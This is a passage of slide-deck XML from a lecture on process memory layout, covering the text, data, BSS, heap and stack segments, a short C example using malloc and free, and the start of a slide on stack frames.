      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;102;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6664625" y="1912200"/>
            <a:ext cx="54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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Google Shape;103;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5393575" y="1446650"/>
            <a:ext cx="120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0x238459e3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5393575" y="2294100"/>
            <a:ext cx="120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0x238459e4</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;105;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5455025" y="1046450"/>
            <a:ext cx="120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0x238459e0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156000" y="7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Memory layout</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;111;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4198250" y="3785700"/>
            <a:ext cx="1367700" cy="39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Text segment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Google Shape;112;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4198250" y="3386100"/>
            <a:ext cx="1367700" cy="39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Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>segment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Google Shape;113;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4198250" y="2986500"/>
            <a:ext cx="1367700" cy="39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BSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> segment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Google Shape;114;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4198250" y="2469200"/>
            <a:ext cx="1367700" cy="51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Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> segment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4198250" y="1809213"/>
            <a:ext cx="1367700" cy="651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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4198250" y="1417825"/>
            <a:ext cx="1367700" cy="39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stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (a,b,ptr)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="117" name="Google Shape;117;p21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873825" y="1687900"/>
            <a:ext cx="0" cy="381600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4873825" y="2225263"/>
            <a:ext cx="0" cy="353400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Google Shape;119;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="3911775"/>
            <a:ext cx="1133100" cy="3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Low addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Google Shape;120;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="1276963"/>
            <a:ext cx="1133100" cy="3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high</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4201475" y="1185225"/>
            <a:ext cx="1200" cy="3229200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5573075" y="1185225"/>
            <a:ext cx="1200" cy="3229200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="3386100"/>
            <a:ext cx="1133100" cy="3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Initialized </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3126300" y="2986488"/>
            <a:ext cx="1133100" cy="3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uninitialized</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Google Shape;125;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6273535" y="1185225"/>
            <a:ext cx="2848500" cy="3774900"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Text: program code</a:t>
            </a:r>
            <a:endParaRPr b="0" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Data: global and static variables </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>initialized</a:t>
            </a:r>
            <a:endParaRPr b="0" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>BSS: uninitialized global and static variables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Heap: dynamic allocated data (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>malloc() or new()</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Stack:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> a collection of stack frame. Keep the history of unreturned functions: parameters, local variables, return address, frame pointer etc.</a:t>
            </a:r>
            <a:endParaRPr b="0" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Google Shape;126;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="1083450"/>
            <a:ext cx="3618600" cy="3774900"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>int x = 100;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>int main()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    int a =2;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    float b = 2.5;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    static int y;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    int *ptr = (int *) malloc(20*sizeof(int);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    ptr[0] = 5;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    ptr[1] = 6;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    free(ptr);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    return 1;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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156000" y="7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Stack Frame</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Google Shape;132;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="369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33" name="Google Shape;133;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625149" y="1549100"/>
            <a:ext cx="1287900" cy="622200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="37425" lIns="74825" spcFirstLastPara="1" rIns="74825" wrap="square" tIns="37425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1500" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
